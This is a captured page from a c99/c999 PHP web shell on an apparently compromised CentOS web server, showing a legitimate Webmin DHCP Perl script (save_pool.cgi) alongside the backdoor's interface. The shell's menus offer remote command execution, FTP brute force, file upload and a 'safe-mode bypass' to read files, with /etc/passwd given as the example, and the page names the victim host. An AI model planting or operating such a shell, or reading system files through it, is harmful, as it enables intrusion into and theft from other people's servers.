!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/dhcpd/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_pool.cgi (2.54 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_pool.cgi
# Create, update or delete an address pool

require './dhcpd-lib.pl';
require './params-lib.pl';
&ReadParse();
&lock_file($config{'dhcpd_conf'});
$conf = &get_config();
if ($in{'sidx'} ne "") {
    $sha = $conf->[$in{'sidx'}]; 
    $sub = $sha->{'members'}->[$in{'uidx'}];
    $indent = 2;
    }
else {
    $sub = $conf->[$in{'uidx'}];
    $indent = 1;
    }
if ($in{'new'}) {
    $pool = { 'name' => 'pool',
          'type' => 1,
          'members' => [ ] };
    }
else {
    $pool = $sub->{'members'}->[$in{'idx'}];
    }

# check acls
%access = &get_module_acl();
&error_setup($text{'eacl_aviol'});
&error("$text{'eacl_np'} $text{'eacl_pus'}") if !&can('rw', \%access, $sub);

# save
if ($in{'delete'}) {
    # Delete this pool from it's subnet
    &save_directive($sub, [ $pool ], [ ], 0);
    }
else {
    # Validate inputs
    for($i=0; defined($low = $in{"range_low_$i"}); $i++) {
        next if (!$low);
        $hi = $in{"range_hi_$i"}; $dyn = $in{"range_dyn_$i"};
        &check_ipaddress($low) ||
            &error("'$low' $text{'ssub_invalidipr'}");
        !$hi || &check_ipaddress($hi) ||
            &error("'$hi' $text{'ssub_invalidipr'}");
        $rng = { 'name' => 'range',
             'values' => [ ($dyn ? "dynamic-bootp" : ()),
                       $low, ($hi ? $hi : ()) ] };
        push(@rng, $rng);
        }
    &save_directive($pool, "range", \@rng, 1);
    if($in{'failover_peer'}) {
        !&check_domain($in{'failover_peer'}) ||
            &error("'$in{'failover_peer'}' $text{'ssub_invalidfopeer'}");
        $in{'failover_peer'} = "\"$in{'failover_peer'}\"";    
            push(@failover_peer, { 'name' => 'failover peer',
                                       'values' => [ $in{'failover_peer'} ] });
        }
        &save_directive($pool, "failover", \@failover_peer, 1);

    $in{'allow'} =~ s/\r//g;
    foreach $a (split(/\n/, $in{'allow'})) {
        push(@allow, { 'name' => 'allow', 'values' => [ $a ] });
        }
    &save_directive($pool, "allow", \@allow, 1);
    $in{'deny'} =~ s/\r//g;
    foreach $a (split(/\n/, $in{'deny'})) {
        push(@deny, { 'name' => 'deny', 'values' => [ $a ] });
        }
    &save_directive($pool, "deny", \@deny, 1);
    &parse_params($pool, 0);

    # Save or create the pool
    if ($in{'new'}) {
        &save_directive($sub, [ ], [ $pool ], $indent);
        }
    else {
        &save_directive($sub, [ $pool ], [ $pool ], $indent);
        }
    }
&flush_file_lines();
&unlock_file($config{'dhcpd_conf'});
if ($sub->{'name'} eq 'subnet') {
    &webmin_log('modify', 'subnet',
            "$sub->{'values'}->[0]/$sub->{'values'}->[2]", \%in);
    &redirect("edit_subnet.cgi?sidx=$in{'sidx'}&idx=$in{'uidx'}");
    }
else {
    &webmin_log('modify', 'shared', $sub->{'values'}->[0], \%in);
    &redirect("edit_shared.cgi?idx=$in{'uidx'}");
    }

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0151 ]--